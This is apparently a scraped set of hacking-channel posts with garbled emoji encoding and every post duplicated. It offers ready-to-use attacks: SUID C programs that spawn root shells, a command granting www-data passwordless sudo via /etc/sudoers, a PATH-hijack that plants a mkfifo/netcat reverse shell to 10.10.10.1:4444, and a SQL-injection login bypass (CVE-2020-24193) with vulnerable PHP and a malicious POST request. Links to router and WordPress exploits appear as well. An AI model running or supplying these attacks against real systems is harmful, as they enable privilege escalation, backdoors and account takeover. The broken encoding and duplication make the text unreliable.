β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Exploit Development References
π¦Tutorials and Examples :
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html)
* [Shellcode Examples](http://shell-storm.org/shellcode/)
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
* [Exploit Exercises](https://exploit-exercises.com/)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Exploit Development References
π¦Tutorials and Examples :
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html)
* [Shellcode Examples](http://shell-storm.org/shellcode/)
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
* [Exploit Exercises](https://exploit-exercises.com/)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Local Privilege Escalation #Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\
1) SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2) SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
4) Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
>
to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
Enjoy β€οΈππ»
β git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Local Privilege Escalation #Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\
1) SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2) SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
4) Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
>
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
6) You may find a command is being executed by the root user, you may be able to modify the system PATH environment variableto execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
Enjoy β€οΈππ»
β git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#PAYLOAD #EXPLOIT
W HA T I S S E C L I S T S:
SecLists is the security tester's tool. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip
2) unzip SecList.zip
3) rm -f SecList.zip
4) -h
NOTE: Downloading this repository is likely to cause a false-positive alarm by your anti-virus or anti-malware software, the filepath should be whitelisted. There is nothing in SecLists that can harm your computer as-is, however it's not recommended to store these files on a server or other important system due to the risk of local file include attacks.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#PAYLOAD #EXPLOIT
W HA T I S S E C L I S T S:
SecLists is the security tester's tool. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip
2) unzip SecList.zip
3) rm -f SecList.zip
4) -h
NOTE: Downloading this repository is likely to cause a false-positive alarm by your anti-virus or anti-malware software, the filepath should be whitelisted. There is nothing in SecLists that can harm your computer as-is, however it's not recommended to store these files on a server or other important system due to the risk of local file include attacks.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦lastest 2020 Daily Tracker System 1.0 -
Authentication Bypass
#Exploit
CVE ID: CVE-2020-24193
Date: September 2, 2020
# Vulnerable Source Code
if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
$_SESSION['detsuid']=$ret['ID'];
header('location:dashboard.php');
}
else{
$msg="Invalid Details.";
}
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦lastest 2020 Daily Tracker System 1.0 -
Authentication Bypass
#Exploit
CVE ID: CVE-2020-24193
Date: September 2, 2020
# Vulnerable Source Code
if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
$_SESSION['detsuid']=$ret['ID'];
header('location:dashboard.php');
}
else{
$msg="Invalid Details.";
}
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Full analysis/exploit of the Netgear Nighthawk R8300 using PreAuth RCE
#Exploit #Analysis
#Advanced level !
https://undercode.help/full-analysis-exploit-of-the-netgear-nighthawk-r8300-using-preauth-rce
#Exploit #Analysis
#Advanced level !
https://undercode.help/full-analysis-exploit-of-the-netgear-nighthawk-r8300-using-preauth-rce
π¦Exploit WordPress with Vulnerable WordPress plugin:
#Exploit
https://undercode.help/exploit-wordpress-with-vulnerable-wordpress-plugin/
#Exploit
https://undercode.help/exploit-wordpress-with-vulnerable-wordpress-plugin/